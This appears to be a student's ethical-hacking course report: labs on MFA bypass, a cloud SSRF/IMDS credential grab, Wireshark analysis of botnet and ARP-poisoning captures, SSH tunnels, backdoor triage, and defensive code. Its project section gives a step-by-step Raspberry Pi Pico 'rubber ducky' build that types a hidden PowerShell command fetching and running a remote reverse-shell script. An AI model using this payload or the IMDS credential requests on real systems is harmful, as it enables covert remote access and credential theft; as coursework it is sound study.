- Well, there are actually several ways to do so, but in the end it's up to the companies to reimagine their cybersecurity landscape, keeping the vulnerabilities of MFA (specifically 2FA) in mind ([5 Ways Hackers Can Get Around Your MFA Solution](https://www.spiceworks.com/it-security/identity-access-management/articles/5-ways-hackers-can-get-around-your-mfa-solution/)) (Read this article, it's really good).
Just to mention a couple of ways are:
- **MFASweep -** is a PowerShell script that attempts to log in to various Microsoft services using a provided set of credentials and will attempt to identify if MFA is enabled. Depending on how conditional access policies and other multi-factor authentication settings are configured, some protocols may end up being left single factor [Exploiting MFA Inconsistencies on Microsoft Services](https://www.blackhillsinfosec.com/exploiting-mfa-inconsistencies-on-microsoft-services/).
- **Simjacking -** involves hackers impersonating a user to a carrier to redirect phone-based authentication codes to a new SIM, compromising accounts such as digital banking and social media. This technique, although primitive, was effectively used by a group named Chuckling Squad to gain brief access to Twitter CEO Jack Dorsey's account, enabling them to post offensive content.
- **Cerberus malware -** targets multi-factor authentication systems like Google Authenticator, capturing one-time codes through screenshots to bypass MFA, highlighting a growing trend of sophisticated attacks designed to exploit MFA protocols and access sensitive data. This underscores the evolving challenge in cybersecurity to adapt and strengthen defenses against such advanced threats.
## **5.2.2 Cloud SSRF/IMDS Attack**
### **A) Explain what the 169.254.169.254 IP-address really is and what it is used for in the cloud?**
- The IP address **169.254.169.254** is a link-local address (it is never routed beyond the instance's own network link) that cloud providers reserve as the entry point for the Instance **Metadata Service (IMDS)**. This service delivers metadata about the virtual machine instance it is queried from, such as the instance ID, type, region, and more.
### **B) How can you from an instance in your selected cloud (a real one) view the Instance Metadata Service (IMDS) credentials via curl?**
- To view the **Instance Metadata Service (IMDS)** credentials from an instance within a cloud environment using **curl**, you send a request to the IP address **169.254.169.254**. The exact path and method for accessing the IMDS credentials vary slightly between cloud providers.
- For **AWS**: AWS uses IMDSv2 (Instance Metadata Service version 2), which requires a session token for added security. So you first retrieve a token with a PUT request:
```bash
TOKEN=$(curl -X PUT "http://169.254.169.254/latest/api/token" -H "X-aws-ec2-metadata-token-ttl-seconds: 21600")
```
**Then** use the token to request the desired metadata:
```bash
curl -H "X-aws-ec2-metadata-token: $TOKEN" http://169.254.169.254/latest/meta-data/
```
- For **OCI**: We can run ```curl -H "Authorization: Bearer Oracle" -L http://169.254.169.254/opc/v2/instance/``` in order to get the metadata. I tried it on my instance and got a bunch of information.
### **C) Try the SSRF/IMDS attack on your selected cloud tenancy using the included (cloud_hack local download) POC script ssrf.py**
- **Command (the URL passed to ssrf.py):** ```http://169.254.169.254/latest/meta-data/iam/security-credentials/falsimentis-deploy.role/```
![sam](https://hackmd.io/_uploads/BynR4-I2T.png)
### **D) How can we prevent the abuse of SSRF/IMDS attacks?**
- There are several ways of preventing **SSRF attacks**, especially those aimed at the **IMDS** in cloud environments; they combine network security best practices, proper configuration and application-level safeguards.
**Here are some examples:**
- Use **IMDSv2** instead of **v1**: it requires a session-oriented request (a token obtained with a PUT and a custom header) before any metadata can be read, which adds a layer of protection against **SSRF attacks**, because a plain GET forwarded by a vulnerable server is no longer enough.
- **Restrict outbound traffic:** implement strict firewall rules and security groups to control outbound traffic from your servers, preventing unauthorized access to internal resources, including the IMDS endpoint.
- **Proper input validation and sanitization:** in the SANS lab everything that was entered into the web server was accepted as-is, which is what made the request to the IMDS possible. User-supplied URLs should be checked before the server fetches them.
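As an illustration of the last bullet, here is my own example of a URL check a server-side fetcher could run before following a user-supplied link; it is added here and is not part of the lab or the SANS material. The function and constant names are mine, and it covers the alternative spellings of 169.254.169.254 (decimal, hex, IPv4-mapped IPv6, octal) that defeat a naive string comparison.

```python
import ipaddress
import re
from urllib.parse import urlsplit

# Ranges a server-side fetcher must never reach on a user's behalf. 169.254.0.0/16
# is the link-local block where the IMDS endpoint 169.254.169.254 lives.
BLOCKED_NETWORKS = [ipaddress.ip_network(n) for n in (
    "169.254.0.0/16", "127.0.0.0/8", "0.0.0.0/8",
    "10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16",
    "::1/128", "fe80::/10", "fd00::/8",
)]

def host_as_ip(host):
    """Turn an IP-literal host into an ip_address, accepting the alternative
    spellings (decimal, hex, IPv4-mapped IPv6) that bypass a plain string
    comparison against '169.254.169.254'. Returns None for DNS names."""
    try:
        addr = ipaddress.ip_address(host)
    except ValueError:
        try:                                  # 2852039166 or 0xa9fea9fe
            value = int(host, 0)
        except ValueError:
            return None
        if not 0 <= value <= 0xFFFFFFFF:
            return None
        addr = ipaddress.IPv4Address(value)
    if isinstance(addr, ipaddress.IPv6Address) and addr.ipv4_mapped is not None:
        addr = addr.ipv4_mapped               # ::ffff:169.254.169.254
    return addr

def validate_fetch_url(url):
    """Return (ok, reason) for a user-supplied URL before the server fetches it.
    Hostnames are not resolved here: a real deployment must also check the
    resolved address and pin it for the actual connection (DNS rebinding),
    and should still move to IMDSv2, since this check is only one layer."""
    try:
        parts = urlsplit(url)
        port = parts.port
    except ValueError as exc:
        return False, f"malformed URL: {exc}"
    if parts.scheme not in ("http", "https"):
        return False, "scheme not allowed"
    host = parts.hostname
    if not host:
        return False, "no host"
    if port not in (None, 80, 443):
        return False, "port not allowed"
    addr = host_as_ip(host)
    # fail closed on numeric-looking hosts we could not parse, e.g. the octal
    # form 0251.0376.0251.0376 that some resolvers accept
    if addr is None and re.fullmatch(r"(?=.*\d)[0-9a-fx.]+", host):
        return False, "unparseable numeric host"
    if addr is not None and any(addr in net for net in BLOCKED_NETWORKS):
        return False, f"{addr} is in a blocked range"
    return True, "ok"
```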
## **5.4 Wireshark – Attack and Reconnaissance Signatures**
### **A) Using the osfingerprinting.pcap file make a Wireshark filter that displays all unique illegal ping packets.**
- After investigating the osfingerprinting.pcap file in Wireshark, I used the display filter ```icmp.type == 8 && icmp.code != 0``` to show all unique illegal ping packets.
### **B) Using active-scan.pcap and the illegal ping packet filter from task a. Try to find an ICMP echo request (type 8) packet with the wrong code value.**
- Used the same filter ```icmp.type == 8``` and got a **code: 19**, which is **LANguard**.
![5.4-B](https://hackmd.io/_uploads/rktu_Wq36.png)
### **C) Using active-scan.pcap note the number of TCP resets, how many?**
- **Filter command:** ```tcp.flags.reset == 1```
**Displayed:** 229
![5.4-C](https://hackmd.io/_uploads/BJt1F-cn6.png)
### **D) Using active-scan.pcap, did the scanner look for any open UDP ports, if so which ones?**
- **Filter command:** ```icmp.type == 3``` and we found **Port 161**
![5.4-D](https://hackmd.io/_uploads/B1NbnQchT.png)
### **E) Using sick-client.pcap try to identify the bot information (user/nick, IP:port) the bot (bbjj.househot) use when connecting to its botnet**
- **Filter command:** ```tcp.stream eq 1```
We follow the TCP stream to identify the bot information.
**USeR:** l l l l
**NiCK:** p8-00196671
**IP:** 10.129.211.13
**Dst port:** 18067
**Src port:** 1048
![5.4-E](https://hackmd.io/_uploads/SJmEaX9nT.png)
- A DNS query packet is seen being sent from the source IP address of 10.129.211.13 to the destination IP address of 10.129.56.6 with the aim of obtaining the A record for the domain bbjj.househot.com. Later, a DNS response packet is observed in which it is disclosed that ypgw.wallloan.com is the destination of a CNAME record for the domain bbjj.househot.com. The latter domain has connections to several IP addresses, a few of which are listed below. Additionally, the packet includes details on the NS records for ns.xinnet.cn and ns.xinnetdns.com.
![asdasdasdasdasdasdasdasd](https://hackmd.io/_uploads/rJyKAVqna.png)
### **F) This is a capture from a compromised system which boots up, runs for just about 3 minutes, then CPU utilization hits 100% and the system locks up. Using clientdying.pcap describe what is happening?**
- We start by looking at **TFTP** first and see that it reads a file called **analiz.exe** along with a bunch of other data.
![5.4-F1](https://hackmd.io/_uploads/SyktI4qhT.png)
- **SMB:** We can also see a **DCERPC** bind request being made from the IP **69.144.115.50** to the destination **172.16.1.10**. This tells us that the attacker seems to be setting up a connection over **SMB**.
![5.4-F2](https://hackmd.io/_uploads/HJ0yuNq2a.png)
- **IRC:** **Filter command** ```tcp.stream eq 13``` and we follow the TCP stream. The output shows us that the compromised system connects to the IRC server "hunt3d.devilz.net" with the NiCK "damn-0262937047".
The server recognizes the hostname after responding with authentication messages, which indicates a successful connection.
We can also see that the IRC server sends commands to download files from specified URLs: "http://www.wanees.net/bbnz.exe", "http://webacceptor.findwhatevernow.com:8091/get.file?action=file&afp=13001&class=682&affiliate=jocker" and "http://ysbweb.com/ist/scripts/ysb_exe.php?account_id=1000489&user_level=3".
The victim also receives commands to execute the downloaded files, such as "joker.exe", "bbnz.exe" and "ysbinstall_1000489_3.exe".
In the last packets you can see that the connection attempts fail at the SYN packets, which indicates that the compromised system is no longer responding.
![Untitled](https://hackmd.io/_uploads/H1IG2N536.png)
- **RPC:** We can also see the attacker initiating a connection to the Windows RPC service on the victim machine.
![Untitwwwwwwwwwwwwwled](https://hackmd.io/_uploads/HyRKnNcnT.png)
### **G) The arp-poison.pcap is a capture from a man-in-the-middle attack. What IP and MAC address is the attacker having and who are the victims, explain for me please!?**
- **Attacker's IP:** 192.186.1.102 with the **MAC address:** AmbitMicrosy_aa:af:80 (00:d0:59:aa:af:80)
and the **Victims:** 192.168.1.1 & 192.168.1.103
![5.4-G](https://hackmd.io/_uploads/HJnfvk92T.png)
- You can see the attack take place starting at rows **6 & 7**.
The attacker sends **ARP messages** to both victims, falsely claiming their IP addresses, so the victims send their traffic to the attacker instead of the real destination. In packet 7 the attacker claims the IP address 192.168.1.103 in an ARP message sent to 192.168.1.1; in a subsequent packet it impersonates 192.168.1.1 in an ARP message sent to 192.168.1.103. Once the victims' ARP tables are altered, all traffic exchanged between them passes through the attacker. For example, in packet 15 192.168.1.1 sends an HTTP GET request to 192.168.1.103, but the attacker intercepts the request and modifies it by adding a "Host" header before forwarding it to 192.168.1.103. The attacker then intercepts the next HTTP response meant for 192.168.1.1 and modifies it as they see fit.
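The poisoning pattern described above can be detected from the ARP traffic alone: an IP that was bound to one MAC suddenly being claimed by another. The detector below is my own added example, not part of the lab, and the frames it runs on are constructed by hand to mirror the capture (same attacker MAC and victim IPs as reported above), not taken from arp-poison.pcap.

```python
from collections import defaultdict

# Constructed frames, shaped (frame_no, opcode, sender_mac, sender_ip, target_ip),
# opcode 1 = request, 2 = reply. Not the real capture; the addresses reuse the ones above.
CONSTRUCTED_ARP = [
    (1, 1, "00:11:22:33:44:01", "192.168.1.1",   "192.168.1.103"),
    (2, 2, "00:11:22:33:44:67", "192.168.1.103", "192.168.1.1"),
    (6, 2, "00:d0:59:aa:af:80", "192.168.1.103", "192.168.1.1"),    # attacker claims .103
    (7, 2, "00:d0:59:aa:af:80", "192.168.1.1",   "192.168.1.103"),  # attacker claims .1
    (9, 2, "00:11:22:33:44:67", "192.168.1.103", "192.168.1.1"),    # real .103 answers again
]

def detect_arp_poisoning(frames):
    """Learn each IP's MAC from the first ARP that names it (like a host's ARP
    cache), then flag every later packet that binds the same IP to a different MAC.
    Returns (alerts, suspect_macs, spoofed_ips). This trusts the first sighting;
    a capture that starts mid-attack needs a known-good IP-to-MAC table instead."""
    cache = {}                                  # IP -> first MAC seen for it
    claims = defaultdict(set)                   # MAC -> IPs it has claimed
    alerts = []
    for frame_no, op, mac, sender_ip, target_ip in frames:
        claims[mac].add(sender_ip)
        known = cache.setdefault(sender_ip, mac)
        if known != mac:
            kind = "reply" if op == 2 else "request"
            alerts.append((frame_no, sender_ip, known, mac, kind))
    # the poisoner is a MAC that both contradicted an earlier binding and
    # speaks for more than one IP (a gateway doing proxy ARP would not contradict)
    suspects = {a[3] for a in alerts if len(claims[a[3]]) > 1}
    spoofed = {a[1] for a in alerts if a[3] in suspects}
    return alerts, suspects, spoofed

if __name__ == "__main__":
    alerts, suspects, spoofed = detect_arp_poisoning(CONSTRUCTED_ARP)
    for frame_no, ip, old, new, kind in alerts:
        print(f"frame {frame_no}: {ip} moved from {old} to {new} ({kind})")
    print("suspect MACs:", suspects, "spoofed IPs:", spoofed)
```

The same tuples can be pulled from the real capture with `tshark -r arp-poison.pcap -Y arp -T fields -e frame.number -e arp.opcode -e arp.src.hw_mac -e arp.src.proto_ipv4 -e arp.dst.proto_ipv4`.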
## **5.5.1 Forward SSH tunnel**
### **Report: What was your commands and result (screenshot)?**
- **Command:** ```ssh -L 6661:sqube-student.du.se:9000 h21samva@maggie.du.se``` and then I entered the website "localhost:6661" and reached SonarQube and got access.
![5.5.1](https://hackmd.io/_uploads/BJtx3Zch6.png)
## **5.5.2 Socks proxy SSH tunnel**
### **Report: What was your commands and result (screenshot)?**
- **Commands:** ```ssh -D 1234 -C h21samva@130.243.52.242``` and, after I logged in, I opened a new terminal in the Chrome directory and entered ```chrome --proxy-server="socks5://localhost:5080"```; in the Chrome application I entered the address **sqube-student.du.se:9000** and got access.
![5.2.2](https://hackmd.io/_uploads/Bklpbzc3p.png)
## **5.5.3 Reverse SSH tunnel**
### **Report: What was your commands and result (screenshot) in task A and B?**
### **A)**
- So I started off by entering the **Command:** ```sudo ssh -R 2222:localhost:22 -i /home/h21samva/Downloads/key.key ubuntu@129.151.212.132``` and logged in from my kali machine.
Then I logged in to my Oracle VM from Windows CMD and ssh'd to my kali machine from the Oracle VM.
```ssh -p 2222 h21samva@localhost```, thus doing a reverse SSH tunnel.
![5.5.3](https://hackmd.io/_uploads/rypwofc2p.png)
### **B)**
- So here I logged on to my Oracle VM (left terminal) and afterwards logged in from the localhost (right terminal). I was a bit confused about whether that was the task or not, but I think I figured it out.
![5.5.3-B](https://hackmd.io/_uploads/ByPUWrq2a.png)
## **5.5.4 Double pivot SSH tunnel**
### **Report: What was your commands and result (screenshot)?**
- **Command:** ```ssh -p 22 ubuntu@129.151.212.132 -L 2222:maggie.du.se:22``` to create a forward double pivot SSH tunnel (left terminal).
Then we connect to maggie with **Command:** ```ssh -p 2222 h21samva@localhost``` (right terminal) and got access to maggie.
![5.5.4](https://hackmd.io/_uploads/ByYfMHc3T.png)
## **5.6 Reverse engineer managed code**
### **Report: Describe the decoding/encoding algorithm in short and the found evidence for your statement.**
- The **encoding/decoding algorithm** is **base64**. I verified it by using **ILSpy**.
![5.6](https://hackmd.io/_uploads/ByzbCyc2T.png)
**Base64** represents binary data in an ASCII string format, and is often used for encoding/decoding data when transmitting it over a network, storing it in databases, etc.
Base64 is commonly used for:
- Storing passwords.
- Evading anti-spam systems and IDS/IPS.
- Obfuscating both binary and scripting malware.
- URL, crypto and mail applications.
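To make the "describe the algorithm" part concrete, here is base64 written out step by step as my own added example (not from the lab and not the ILSpy output). In decompiled managed code the whole thing is usually hidden behind a single library call, so the telltale signs to look for are the ones this code makes explicit: a 64-character table, 3-byte in / 4-symbol out groups, `>> 18/12/6` shifts with `& 0x3F`, and `=` padding.

```python
import base64

ALPHABET = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/"
DECODE_TABLE = {c: i for i, c in enumerate(ALPHABET)}

def b64encode(data: bytes) -> str:
    """3 input bytes (24 bits) -> 4 symbols of 6 bits each; '=' pads a short tail."""
    out = []
    for i in range(0, len(data), 3):
        chunk = data[i:i + 3]
        n = int.from_bytes(chunk.ljust(3, b"\0"), "big")      # zero-fill the tail
        symbols = [ALPHABET[(n >> shift) & 0x3F] for shift in (18, 12, 6, 0)]
        keep = len(chunk) + 1               # 1 byte -> 2 symbols, 2 -> 3, 3 -> 4
        out.append("".join(symbols[:keep]) + "=" * (4 - keep))
    return "".join(out)

def b64decode(text: str) -> bytes:
    """Strict inverse: rejects bad length, stray characters and misplaced padding."""
    if len(text) % 4:
        raise ValueError("length must be a multiple of 4")
    out = bytearray()
    for i in range(0, len(text), 4):
        group = text[i:i + 4]
        pad = group.count("=")
        if pad > 2 or (pad and (not group.endswith("=" * pad) or i + 4 != len(text))):
            raise ValueError("padding may only close the final group")
        n = 0
        for c in group[:4 - pad]:
            if c not in DECODE_TABLE:
                raise ValueError(f"character {c!r} not in the base64 alphabet")
            n = (n << 6) | DECODE_TABLE[c]
        n <<= 6 * pad                       # put back the zero bits padding stands for
        out += n.to_bytes(3, "big")[:3 - pad]
    return bytes(out)

def rejects(text: str) -> bool:
    """True if b64decode refuses the input (used to show the strictness checks)."""
    try:
        b64decode(text)
    except ValueError:
        return True
    return False

def matches_stdlib() -> bool:
    """Cross-check against Python's base64 module for every byte value and tail length."""
    for length in range(0, 300):
        data = bytes(range(256))[:length] if length <= 256 else bytes(length)
        if b64encode(data) != base64.b64encode(data).decode():
            return False
        if b64decode(b64encode(data)) != data:
            return False
    return True
```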
## **5.7 Analysis of an unknown binary file**
### **Report: What are the true capabilities and functions of the file? Document all the steps and commands you used and the motive for performing those in your answer. Attach relevant output and findings in your answer. You should be able to find the origins of the malware on the internet.**
- We start off with a static analysis by executing the **Commands:** ```binwalk esh``` & ```readelf -a esh``` and get information about the esh file:
![5.7](https://hackmd.io/_uploads/HJ9Snfon6.png)
- Afterwards we execute the **Command:** ```upx -d esh -o esh_unpacked``` to unpack the file and then dump its printable strings to a .txt file with the **Command:** ```strings esh_unpacked > unpacked_esh.txt```
![5.7-B](https://hackmd.io/_uploads/S11ICzj2a.png)
Investigating the .txt file we find a backdoor from "SIMPP", and after googling it we find the website "https://packetstormsecurity.com/files/69560/evilshell.c.html"
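A small static-triage helper, added here as my own example (not from the lab), that does programmatically what the three commands above do by hand: read the ELF header the way readelf -h reports it, look for the UPX marker before deciding whether to run upx -d, and pull printable strings like strings does. The SAMPLE blob is constructed, not the real esh binary, and the URL inside it is a placeholder.

```python
import re
import struct

ELF_MAGIC = b"\x7fELF"
UPX_MARKER = b"UPX!"                       # marker UPX leaves in packed files
MACHINES = {0x03: "x86", 0x3E: "x86-64", 0x28: "ARM", 0xB7: "AArch64"}

def parse_elf_header(blob: bytes) -> dict:
    """Decode class, byte order, type, machine and entry point from the ELF header."""
    if blob[:4] != ELF_MAGIC or len(blob) < 52:
        raise ValueError("not an ELF file")
    is_64 = blob[4] == 2                    # EI_CLASS: 1 = ELF32, 2 = ELF64
    endian = "<" if blob[5] == 1 else ">"   # EI_DATA: 1 = little, 2 = big
    e_type, e_machine = struct.unpack_from(endian + "HH", blob, 16)
    # e_entry sits at offset 24 in both classes; only its width differs
    e_entry = struct.unpack_from(endian + ("Q" if is_64 else "I"), blob, 24)[0]
    return {
        "class": "ELF64" if is_64 else "ELF32",
        "endian": "little" if endian == "<" else "big",
        "type": {2: "EXEC", 3: "DYN"}.get(e_type, hex(e_type)),
        "machine": MACHINES.get(e_machine, hex(e_machine)),
        "entry": e_entry,
    }

def is_upx_packed(blob: bytes) -> bool:
    return UPX_MARKER in blob

def extract_strings(blob: bytes, min_len: int = 4) -> list:
    """Same idea as `strings`: runs of printable ASCII of at least min_len bytes."""
    return [m.group().decode() for m in re.finditer(rb"[\x20-\x7e]{%d,}" % min_len, blob)]

def triage(blob: bytes) -> dict:
    info = parse_elf_header(blob)
    info["upx_packed"] = is_upx_packed(blob)      # if True, unpack before reading strings
    strings = extract_strings(blob)
    info["strings"] = strings
    # URLs and shell paths are the first things to pivot on when searching the origin
    info["leads"] = [s for s in strings if "http" in s or "/bin/" in s]
    return info

# Constructed sample: a 64-byte ELF64 x86-64 header followed by bytes that mimic
# what strings/binwalk surface in a UPX-packed backdoor. Not the real esh file.
SAMPLE = (
    ELF_MAGIC + bytes([2, 1, 1, 0]) + b"\0" * 8
    + struct.pack("<HHIQQQIHHHHHH", 2, 0x3E, 1, 0x401000, 64, 0, 0, 64, 56, 1, 64, 0, 0)
    + b"\0" * 8 + b"$Info: This file is packed with the UPX executable packer$"
    + b"\0" * 4 + b"/bin/sh\0" + b"http://example.invalid/evilshell.c\0" + b"UPX!\0"
)

if __name__ == "__main__":
    for key, value in triage(SAMPLE).items():
        print(f"{key}: {value}")
```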
## **5.8 Lab Feedback**
### **A) Was this a relevant and appropriate lab and what about length etc?**
- This was indeed a relevant and good lab. We did it in a group of students, which made it way more fun. I really enjoyed the **SANS labs** and learned a lot. High quality labs and really fun.
- I enjoyed this cloud lab very much.
### **B) What corrections and/or improvements do you suggest for this lab?**
- The SSH tunnel task gave some of the other students some problems. I managed to solve it smoothly. They had some SSH troubles, which we later fixed.
- Perhaps the lab was a bit long, but manageable nonetheless.
---
# **Project report**
## **Reverse Shell using the Raspberry Pi Pico as a Rubber Ducky to inject a payload**
**Date:** 12-03-2024
**Author:** Sam Valashjardi - h21samva@du.se
**Course:** GDT2Y3 - Ethical Hacking
![usb-rubber-ducky_mk2_800x](https://hackmd.io/_uploads/r1kIeP2aa.png)
---
### **Overview:**
**After** a lot of research and many changes to my initial project idea, I have finally chosen to dive into the exciting journey of programming my Raspberry Pi Pico W to be a "bad USB/Rubber Ducky" device, having the capability to inject a malicious payload onto a target system.
This project, also known as **Pico-Ducky**, was taken with inspiration from [dbisu's GitHub page](https://github.com/dbisu/pico-ducky), as well as the innovative payloads provided by [Hak5's GitHub page](https://github.com/hak5) as well, with all the awesome payloads that it offers.
[Hak5](https://shop.hak5.org/) makes industry-leading hacker tools and award-winning hacking shows for red teams, pentesters, cyber security students and IT professionals. I highly recommend you visit their site and check out all the fun stuff they have.
In this report, I will outline a detailed, step-by-step guide into assembling and completing the project. I have made sure to explain each stage in great detail so that you will gain a rounded understanding of the process.
**Happy reading.**
*A side note*: I wanted to encrypt the reverse shell connection at first with the tool [**Socat**](http://www.dest-unreach.org/socat/), but could not manage to get Socat to work on my PC. I came to the conclusion that there had to be some issues between the different versions. So I used Netcat instead for this project, which works just as well.
* *The socat utility is a relay for bidirectional data transfers between two independent data channels. This tool is regarded as the advanced version of netcat. They do similar things, but socat has more additional functionality, such as permitting multiple clients to listen on a port, or reusing connections.*
---
### **Objective:**
**So why this project?**
I think this project is not only an undeniably awe-inspiring one, it is also vitally important. Now, more than ever, applying ethical hacking principles matters in a world full of cyber threats and data breaches.
Just the thought of being able to gain full hidden access to a computer within seconds is rather baffling, and hopefully the project will show how important awareness of your surroundings really is.
---
### **Project setup:**
I will include all the **hardware, tools, configurations, operating system, payloads & scripts** that made the project possible, and walk through it in a step-by-step manner.
**Hardware:**
- **Raspberry Pi Pico W:** *"Raspberry Pi Pico is a low-cost, high-performance microcontroller board with flexible digital interfaces"* - [raspberrypi.com](https://www.raspberrypi.com/products/raspberry-pi-pico/).
**Tools:**
- **NetCat:** *"Netcat or NC is a utility tool that uses TCP and UDP connections to read and write in a network. It can be used for both attacking and security. In the case of attacking. It helps us to debug the network along with investigating it. It runs on all operating systems."* - [geeksforgeeks.org](https://www.geeksforgeeks.org/introduction-to-netcat/).
**Operating system:**
- **Kali Linux:** *"is an open-source, Debian-based Linux distribution aimed at advanced Penetration Testing and Security Auditing. It does this by providing common tools, configurations, and automations which allows the user to focus on the task that needs to be completed, not the surrounding activity.
Kali Linux contains industry specific modifications as well as several hundred tools targeted towards various Information Security tasks, such as Penetration Testing, Security Research, Computer Forensics, Reverse Engineering, Vulnerability Management and Red Team Testing.
Kali Linux is a multi-platform solution, accessible and freely available to information security professionals and hobbyists."* - [kali.org](https://www.kali.org/docs/introduction/what-is-kali-linux/).
- **Windows 10:** Windows 10 is a Microsoft operating system for personal computers, tablets, embedded devices and internet of things devices.
**Configurations:**
- **CircuitPython:** *"is a programming language designed to simplify experimenting and learning to code on low-cost microcontroller boards."* - [circuitpython.org](https://circuitpython.org/).
- **Adafruit circuitpython bundle:** This is the **Adafruit bundle** we use in order to import and make the Pico into a **HID** (more on that later). [GitHub page for Adafruit CircuitPython bundle](https://github.com/adafruit/Adafruit_CircuitPython_Bundle/releases/tag/20240307).
- **Circuitpython keyboard layouts:** We have to change to a Swedish keyboard layout for the **Pico-Ducky** to work and execute the script. [GitHub page for CircuitPython keyboard layout](https://github.com/Neradoc/Circuitpython_Keyboard_Layouts/blob/main/PICODUCKY.md).
**Payload & script:**
- **Payload Library for the USB Rubber Ducky by Hak5:** There are lots of different kinds of payloads here. Everything from **recon, mobile, remote access, pranks, exfiltration** and so on.
Visit the [Hak5 GitHub page](https://github.com/hak5/usbrubberducky-payloads/tree/master/payloads/library) to view all the community developed payloads and libraries.
![payload](https://hackmd.io/_uploads/BkaFLhnaa.png)
> Some examples of payloads.
### **Set up the Pico-Ducky and Kali Linux:**
**First off:** we start with setting up our **Kali Linux.**
We are going to need the IP address of our Kali machine together with a port of our choosing, in this case, it's going to be: **4444.** (What we do with the IP comes later on).
Then we open up the terminal and enter the **command:** ```stty raw -echo; (stty size; cat) | nc -lvnp 4444```
This puts our local terminal into raw mode (so the interactive shell behaves properly once it connects), sends the terminal dimensions from ```stty size``` over the connection, and starts a Netcat listener on port 4444 that waits for the victim PC to connect back.
![kaliNC](https://hackmd.io/_uploads/Hye9ohh6a.png)
**Time to set up the Pico-Ducky:**
- We start by connecting the Pico to our PC and drag the **.uf2** file from the **CircuitPython** files that we downloaded to the root of the Pico. The Pico will reboot and then connect as ```CIRCUITPY```.
![kaliNC](https://hackmd.io/_uploads/B1PDxTn6T.png)
- Then we create a folder in the Pico and name it **lib**. This is where we insert and implement the Adafruit libraries. The most important folder here is **adafruit_hid**.
![lib](https://hackmd.io/_uploads/Hk7Fl62pT.png)
- We have just turned our Pico into a **Human Interface Device (HID)**. This means that we are tricking the computer into thinking that we are a keyboard or a mouse, for example, and by default the computer trusts input from such a device as if it came from a human. That is one of the reasons why this is really dangerous. Another reason why this is so effective is that the Pico-Ducky can type around 1000 words a minute, while a human averages around 60.
![hid](https://hackmd.io/_uploads/HyZ7fThaT.png)
*As we see, the device is under Human Interface Devices.*
- Next step is to load the rest of the files from the Adafruit circuitpython bundle to the root folder of the Pico, which are: ```duckyinpython.py, code.py, webapp.py, wsgiserver.py```.
- We include the keyboard layout in the **lib** folder and change the layout name to the country of your choice. Then we open up the ```duckyinpython.py``` file and specify what language we are using, **sw for Swedish in this case.**
![keyb](https://hackmd.io/_uploads/SyggiEiapp.png)
- Now the final stage, the **script** and **payload**.
I tried a bunch of different payloads and script, everything from prank payloads to recon and remote access. I decided to create my own payload and execute string for it. But the PowerShell script is taken from [antonioCoco](https://raw.githubusercontent.com/antonioCoco/ConPtyShell/master/Invoke-ConPtyShell.ps1), it is quite the script.
The string that is executed is: **```STRING powershell -w hidden IEX(IWR https://raw.githubusercontent.com/antonioCoco/ConPtyShell/master/Invoke-ConPtyShell.ps1 -UseBasicParsing); Invoke-ConPtyShell 192.168.XX.XX 4444```**.
Here is by the way, where you insert the IP of your kali machine and port that we talked about earlier in the report.
![payloadDD](https://hackmd.io/_uploads/HyVkJj6ap.png)
*Here is a screenshot of the payload. I have added a 0.6 second delay on each step so that we can see what is going on, for demonstration purposes. These delays can be significantly reduced, to the point where you can't see what's happening on the screen.*
That is the entire set up for the **Pico-Ducky**.
### **Finalizing the project and demonstrating it**
I have recorded a video of the demonstration.
**[You will find it here.](https://www.youtube.com/watch?v=f8vYq_Sl33Y&feature=youtu.be)**
### **Summary, Thoughts & Student questions**
I really enjoyed working on this project; it is something that I have wanted to do for a while. The labs we had prior to this project really helped pave the way in understanding each step a lot.
This was, without a doubt, the best course in the whole programme. There were some hardships at first when I wanted to use **SoCat** in order to encrypt the reverse shell, but after many hours I changed to **Netcat** instead. Perhaps for a future project I'll make it work and also compare the connections in **Wireshark** and analyze the traffic.
**What I have learned?**
- Getting up from your laptop for just one second? **Win + L**!!
(*even though there are payloads and scripts that can bypass that as well.*)
But I'm happy and satisfied with what I have achieved in this project.
**Student questions:**
- **A)** Is it possible in this case to use the Pico-Ducky on an operating system other than Windows?
- **B)** Can you use multiple payloads and scripts on one Pico-Ducky?
*All my sources are presented as links throughout the report.*